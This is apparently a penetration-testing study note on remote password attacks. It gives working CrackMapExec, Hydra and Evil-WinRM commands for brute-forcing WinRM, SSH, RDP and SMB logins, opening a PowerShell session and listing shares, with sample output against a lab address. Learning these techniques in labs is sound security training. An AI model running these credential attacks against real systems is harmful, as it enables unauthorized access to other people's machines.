Skip to content

Remote Password Attacks

Network Services

  • the most common services suitable for this are RDP, WinRM, and SSH.
  • SSH is now much less common on Windows, but is the leading service for Linux.

WinRM

  • must be configured manually by the admin
  • Ports 5985 (HTTP) and 5986 (HTTPS).
  • https://github.com/byt3bl33d3r/CrackMapExec
  • Use CrackMapExec for SMB, LDAP, MSSQL, more

CrackMapExec

  • crackmapexec <proto> <target-IP> -u <user or userlist> -p <password or passwordlist>
  • eg:
    $ crackmapexec winrm 10.129.42.197 -u user.list -p password.list

    WINRM       10.129.42.197   5985   NONE    [*] None (name:10.129.42.197) (domain:None)
    WINRM       10.129.42.197   5985   NONE    [*] http://10.129.42.197:5985/wsman
    WINRM       10.129.42.197   5985   NONE    [+] None\user:password (Pwn3d!)
  • Will return Pwn3d! if the password is cracked

Evil-WinRM

  • evil-winrm -i <target-IP> -u <username> -p <password>
  • eg: evil-winrm -i 10.129.42.197 -u user -p password
  • This will establish a terminal session using powershell with the target

SSH

  • TCP port 22
  • Uses: symmetric, asymmetric, hashing
  • Symmetric: same key for encryption decryption
  • Diffie Hellman
  • AES, 3DES, Blowfish
  • Asymmetric: uses a private and public key
  • If the private key is obtained, it can be used to sign in into the system
  • Hashing: SSH uses hashing to confirm the authenticity of messages

For Hydra add -t 48 to use 48 threads for the attack

  • https://www.hackingarticles.in/a-detailed-guide-on-hydra/

Hydra - SSH

  • Brute force SSH using Hydra
  • hydra -L user.list -P password.list ssh://10.129.x.x

RDP:

  • Port 3389
  • Use hydra for rdp brute forcing as well
  • hydra -L user.list -P password.list rdp://10.x.x.x

SMB:

  • Server Message Block (SMB) transfer data between clients and servers in a local network.
  • file and directory sharing and printing services
  • It is Common Internet File System (CIFS)
  • Samba is the SMB implementation on Linux

SMB Password Cracking

  • hydra -L user.list -P password.list smb://10.x.x.x

ISSUE

  • You can get an invalid reply error if the Hydra version is outdated and does not support smbv3 SOLUTION
  • Manually update hydra
  • use msfconsole module (auxiliary/scanner/smb/smb_login)

SMB Share Enum

  • crackmapexec smb 10.129.42.197 -u "user" -p "password" --shares